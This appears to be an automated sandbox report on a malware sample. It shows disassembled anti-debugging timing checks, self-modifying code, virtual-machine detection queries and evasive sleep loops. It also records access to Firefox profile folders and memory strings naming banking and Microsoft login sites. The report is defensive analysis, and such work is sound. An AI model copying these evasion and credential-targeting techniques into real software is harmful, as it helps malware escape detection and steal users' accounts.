Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E50BA2 second address: 6E50BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F45B11B236Eh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F45B11B2377h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E50BD3 second address: 6E50C51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45B187B8DFh 0x00000009 sbb ah, 0000003Eh 0x0000000c jmp 00007F45B187B8E9h 0x00000011 popfd 0x00000012 mov di, ax 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F45B187B8E8h 0x00000021 add cx, B868h 0x00000026 jmp 00007F45B187B8DBh 0x0000002b popfd 0x0000002c pushad 0x0000002d mov edx, esi 0x0000002f popad 0x00000030 popad 0x00000031 pop ebp 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F45B187B8E3h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90A03 second address: 6E90A1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45B11B2376h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90A1E second address: 6E90A35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop edi 0x00000013 movzx ecx, bx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90A35 second address: 6E90A3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90A3B second address: 6E90A3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90A3F second address: 6E90A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8004D second address: 6E80051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E80051 second address: 6E80055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E80055 second address: 6E8005B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8005B second address: 6E800B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F45B11B236Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F45B11B2370h 0x00000016 and esp, FFFFFFF0h 0x00000019 jmp 00007F45B11B2370h 0x0000001e sub esp, 44h 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 call 00007F45B11B236Ch 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E800B3 second address: 6E800DC instructions: 0x00000000 rdtsc 0x00000002 mov eax, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, ebx 0x00000008 popad 0x00000009 push eax 0x0000000a jmp 00007F45B187B8E6h 0x0000000f mov dword ptr [esp], ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E800DC second address: 6E800E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E800E2 second address: 6E800E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E800E8 second address: 6E801B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F45B11B2370h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov al, bl 0x00000015 pushfd 0x00000016 jmp 00007F45B11B236Ah 0x0000001b add si, FDF8h 0x00000020 jmp 00007F45B11B236Bh 0x00000025 popfd 0x00000026 popad 0x00000027 xchg eax, esi 0x00000028 pushad 0x00000029 mov cl, 77h 0x0000002b mov edx, 29651BD4h 0x00000030 popad 0x00000031 push esi 0x00000032 pushad 0x00000033 movzx esi, bx 0x00000036 mov dx, C296h 0x0000003a popad 0x0000003b mov dword ptr [esp], edi 0x0000003e pushad 0x0000003f pushfd 0x00000040 jmp 00007F45B11B2373h 0x00000045 or ah, 0000001Eh 0x00000048 jmp 00007F45B11B2379h 0x0000004d popfd 0x0000004e call 00007F45B11B2370h 0x00000053 pushfd 0x00000054 jmp 00007F45B11B2372h 0x00000059 and ch, 00000048h 0x0000005c jmp 00007F45B11B236Bh 0x00000061 popfd 0x00000062 pop eax 0x00000063 popad 0x00000064 mov edi, dword ptr [ebp+08h] 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E801B4 second address: 6E801BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E801BA second address: 6E801C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E801C0 second address: 6E801C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E801C4 second address: 6E801C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E801C8 second address: 6E8021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+24h], 00000000h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F45B187B8E7h 0x00000017 sbb cx, E3EEh 0x0000001c jmp 00007F45B187B8E9h 0x00000021 popfd 0x00000022 mov edi, eax 0x00000024 popad 0x00000025 lock bts dword ptr [edi], 00000000h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E8021E second address: 6E80224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E80224 second address: 6E80260 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F4621D4DAD3h 0x0000000f pushad 0x00000010 push esi 0x00000011 push ebx 0x00000012 pop eax 0x00000013 pop edx 0x00000014 mov si, F0E5h 0x00000018 popad 0x00000019 pop edi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F45B187B8E7h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E80260 second address: 6E802D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b jmp 00007F45B11B2377h 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F45B11B236Bh 0x0000001a sbb esi, 2443DA1Eh 0x00000020 jmp 00007F45B11B2379h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007F45B11B2370h 0x0000002c and ecx, 3AAF3018h 0x00000032 jmp 00007F45B11B236Bh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E802D6 second address: 6E802DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E802DC second address: 6E80325 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a jmp 00007F45B11B2377h 0x0000000f pop ebp 0x00000010 pushad 0x00000011 push ecx 0x00000012 pushfd 0x00000013 jmp 00007F45B11B236Bh 0x00000018 jmp 00007F45B11B2373h 0x0000001d popfd 0x0000001e pop eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E80325 second address: 6E80329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90B8C second address: 6E90BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, bx 0x00000006 mov dx, 3F6Eh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F45B11B236Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90BA7 second address: 6E90BEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F45B187B8DCh 0x00000010 mov edi, eax 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F45B187B8E3h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E908CD second address: 6E908D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E908D1 second address: 6E908D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E908D7 second address: 6E90918 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 4A2F9EF1h 0x00000008 pushfd 0x00000009 jmp 00007F45B11B236Eh 0x0000000e or eax, 6F23D5C8h 0x00000014 jmp 00007F45B11B236Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F45B11B2370h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90918 second address: 6E90927 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6E90E2F second address: 6E90E35 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0DDA second address: 6ED0DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0DDF second address: 6ED0DF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push esi 0x0000000e pop edi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0DF9 second address: 6ED0E54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B187B8E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F45B187B8E9h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F45B187B8DEh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F45B187B8E7h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0E54 second address: 6ED0F3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dl, byte ptr [ebp+14h] 0x0000000e pushad 0x0000000f movzx ecx, dx 0x00000012 pushfd 0x00000013 jmp 00007F45B11B2375h 0x00000018 and esi, 585C0706h 0x0000001e jmp 00007F45B11B2371h 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr [ebp+10h] 0x00000028 jmp 00007F45B11B236Eh 0x0000002d and dl, 00000007h 0x00000030 jmp 00007F45B11B2370h 0x00000035 test eax, eax 0x00000037 pushad 0x00000038 movzx eax, di 0x0000003b pushfd 0x0000003c jmp 00007F45B11B2373h 0x00000041 and cx, AB9Eh 0x00000046 jmp 00007F45B11B2379h 0x0000004b popfd 0x0000004c popad 0x0000004d je 00007F4621657665h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007F45B11B2373h 0x0000005c or ch, FFFFFFAEh 0x0000005f jmp 00007F45B11B2379h 0x00000064 popfd 0x00000065 jmp 00007F45B11B2370h 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0F3E second address: 6ED0F50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B187B8DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0F50 second address: 6ED0F69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45B11B236Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ecx, ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0F69 second address: 6ED0F6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0F6D second address: 6ED0F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0F73 second address: 6ED0F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B187B8E6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0F8D second address: 6ED0FB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ecx 0x00000009 jmp 00007F45B11B2377h 0x0000000e shr eax, 1 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push ebx 0x00000014 pop esi 0x00000015 push edi 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0FB7 second address: 6ED0FCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45B187B8DFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 6ED0FCA second address: 6ED0DDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4621657565h 0x0000000d jne 00007F45B11B235Dh 0x0000000f inc ecx 0x00000010 shr eax, 1 0x00000012 jne 00007F45B11B235Dh 0x00000014 imul ecx, ecx, 03h 0x00000017 movzx eax, dl 0x0000001a cdq 0x0000001b sub ecx, 03h 0x0000001e call 00007F45B11C285Dh 0x00000023 cmp cl, 00000040h 0x00000026 jnc 00007F45B11B2377h 0x00000028 cmp cl, 00000020h 0x0000002b jnc 00007F45B11B2368h 0x0000002d shld edx, eax, cl 0x00000030 shl eax, cl 0x00000032 ret 0x00000033 or edx, dword ptr [ebp+0Ch] 0x00000036 or eax, dword ptr [ebp+08h] 0x00000039 or edx, 80000000h 0x0000003f pop ebp 0x00000040 retn 0010h 0x00000043 push ebp 0x00000044 push 00000001h 0x00000046 push edx 0x00000047 push eax 0x00000048 call edi 0x0000004a mov edi, edi 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007F45B11B236Bh 0x00000054 push eax 0x00000055 push edx 0x00000056 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 884C81 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A294EE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: A566E3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: AB3D2A instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1190 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1660 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1454 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1122 Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window / User API: threadDelayed 1678 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 2278 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 7721 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 3.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 5356 Thread sleep time: -98049s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4832 Thread sleep time: -2381190s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5484 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5912 Thread sleep time: -3321660s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 6504 Thread sleep time: -2909454s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 380 Thread sleep time: -2245122s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3532 Thread sleep time: -120060s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5552 Thread sleep time: -3357678s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2248 Thread sleep count: 2278 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2248 Thread sleep time: -227800s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2248 Thread sleep count: 7721 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 2248 Thread sleep time: -772100s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\doomed\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\0absryc3.default\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cache2\ Jump to behavior
Source: Amcache.hve.17.dr Binary or memory string: VMware
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: Amcache.hve.17.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: Amcache.hve.17.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696487552
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: Amcache.hve.17.dr Binary or memory string: vmci.sys
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: Amcache.hve.17.dr Binary or memory string: VMware20,1
Source: Amcache.hve.17.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.17.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.17.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.17.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.17.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.17.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.17.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.17.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.17.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.17.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: Amcache.hve.17.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.17.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.17.dr Binary or memory string: VMware, Inc.
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: Amcache.hve.17.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.17.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.17.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.17.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.17.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: Amcache.hve.17.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.17.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: file.exe, 00000000.00000003.2771016200.00000000070C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: file.exe, 00000000.00000003.2700251230.000000000134C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2700391394.000000000134D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2578063518.00000000012ED000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2700433409.000000000135A000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.2748040342.000001F6EA3A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
